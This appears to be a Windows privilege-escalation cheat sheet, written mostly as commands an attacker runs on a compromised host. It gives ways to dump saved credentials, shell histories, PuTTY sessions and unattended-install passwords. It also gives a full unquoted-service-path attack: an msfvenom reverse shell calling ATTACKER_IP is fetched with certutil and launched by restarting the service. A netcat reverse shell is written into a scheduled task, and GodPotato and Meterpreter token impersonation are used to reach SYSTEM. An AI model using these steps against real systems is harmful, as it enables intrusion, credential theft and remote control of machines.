Windows Privesc Checklist

doskey /history
Show user input history.

powershell -c "Get-Service"
Return services.

Get-ScheduledTask
Return Scheduled tasks.

cmdkey /list
List saved credentials (can’t see password).
runas /savecred /user:admin powershell.exe
Run a program with saved creds.

type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
Show CMD history.

type $Env:userprofile\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
Show Powershell History.

type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString
Search for database password in IIS config.

reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s
Look for Putty credentials in registers (SimonTatham is PuTTY’s creator).

Others Suggestions

• https://redteamrecipe.com/40-Method-For-Privilege-Escalation/

Windows Automated Scripts

POWERUP

https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1

. .\PowerUp.ps1
Invoke-AllChecks

PRIVESCHECK

https://github.com/itm4n/PrivescCheck

Set-ExecutionPolicy Bypass -Scope process -Force
. .\PrivescCheck.ps1
Invoke-PrivescCheck

EXPLOIT-SUGGESTER

https://github.com/AonCyberLabs/Windows-Exploit-Suggester

On target

systeminfo

On attacker machine

pip install xlrd==1.2.0

windows-exploit-suggester.py --update
windows-exploit-suggester.py --systeminfo systeminfo.txt --database [DATE]-mssb.xls

WINPEAS

https://github.com/carlospolop/PEASS-ng/releases

winPEASx64.exe Run WinPEAD

WINPEAS Output

WiseBootAssistant(WiseCleaner.com - Wise Boot Assistant)[C:\Program Files (x86)\Wise\Wise Care 365\BootTime.exe] - Auto - Running - No quotes and Space detected YOU CAN MODIFY THIS SERVICE: AllAccess

On attacker machine

msfvenom -p windows/x64/shell_reverse_tcp LHOST=[ATTACKER_IP] LPORT=[ATTACKER_PORT] -f exe -o Wise.exe
Create a reverse shell with the name of the modifiable service.

nc -lvnp [ATTACKER_PORT]
Open a listener.

On target machine

cd "C:\Program Files (x86)\Wise"
certutil.exe -urlcache -f http://[ATTACKER_IP]:[ATTACKER_PORT]/Wise.exe Wise.exe
Download crafted executable and place it where the space is in the vulnerable path.

sc.exe stop WiseBootAssistant
sc.exe query WiseBootAssistant
sc.exe start WiseBootAssistant
Restart the service to execute the crafted one.

ROADRECON (Azure AD)

https://github.com/dirkjanm/ROADtools/wiki/Getting-started-with-ROADrecon

Windows Privesc Potato

Elevate a service user with low privileges to NT AUTHORITY\SYSTEM privileges.

Affected versions:

• Windows Server 2012 to Windows Server 2022
• Windows 8 to Windows 11

GodPotato

https://github.com/BeichenDream/GodPotato/releases

GodPotato -cmd "cmd /c whoami" Privesc and run whoami as NT AUTHORITY\SYSTEM.

Windows Privesc Abusing Schtasks

Show Schtasks

schtasks /query /tn vulnerableTask /fo list /v
Show detail info about the scheduled task.

cd c:\Program Files (x86)\SystemScheduler\Events
type [ID].INI_LOG.txt Show tasks logs.

Replace executable

mv excutedByTask.exe excutedByTask.exe.bak
mv msfvenomeReverseShell excutedByTask.exe Replace exe that being executed by scheduled tasks.

Inject scheduled task

echo c:\tools\nc64.exe -e cmd.exe [ATTACKER_IP] [ATTACKER_PORT] > C:\tasks\schtask.bat
Inject scheduled task with reverse shell.

Windows Privesc Abusing SE Privileges

Here are the most commonly abused privileges:

• SeImpersonatePrivilege
• SeAssignPrimaryPrivilege
• SeTcbPrivilege
• SeBackupPrivilege
• SeRestorePrivilege
• SeCreateTokenPrivilege
• SeLoadDriverPrivilege
• SeTakeOwnershipPrivilege
• SeDebugPrivilege

whoami /priv
Show current user privileges.

SeDebugPrivilege and SeImpersonatePrivilege

If the current user has SeDebugPrivilege and SeImpersonatePrivilege privileges enabled, we are able to impersonate another user.

load incognito
Load icognito module.

list_tokens -u
List Delegation Tokens available (not sure of the flag maybe -g).

impersonate_token "BUILTIN\Administrators"
Impersonate token.

To determine rights, Windows uses the Primary Token of the process and not the impersonated token. So we have to migrate to a process with correct permissions.

The safest to pick is services.exe.

migrate 668
Migrate to process 668.

rev2self
Revert to previous user.

Windows Privesc Unattended Path

Unattended Setup is the method by which OEMs (Original Equipment Manufacturers) install Windows NT in unattended mode. C:\Windows\Panther\Unattend\Unattended.xml is where users' passwords are stored in base64.

type C:\Windows\Panther\Unattend\Unattended.xml
Display unattended password.

<AutoLogon>
    <Password>
        <Value>dHFqSnBFWDlRdjh5YktJM3lIY2M9TCE1ZSghd1c7JFQ=</Value>
        <PlainText>false</PlainText>
    </Password>
    <Enabled>true</Enabled>
    <Username>Administrator</Username>
</AutoLogon>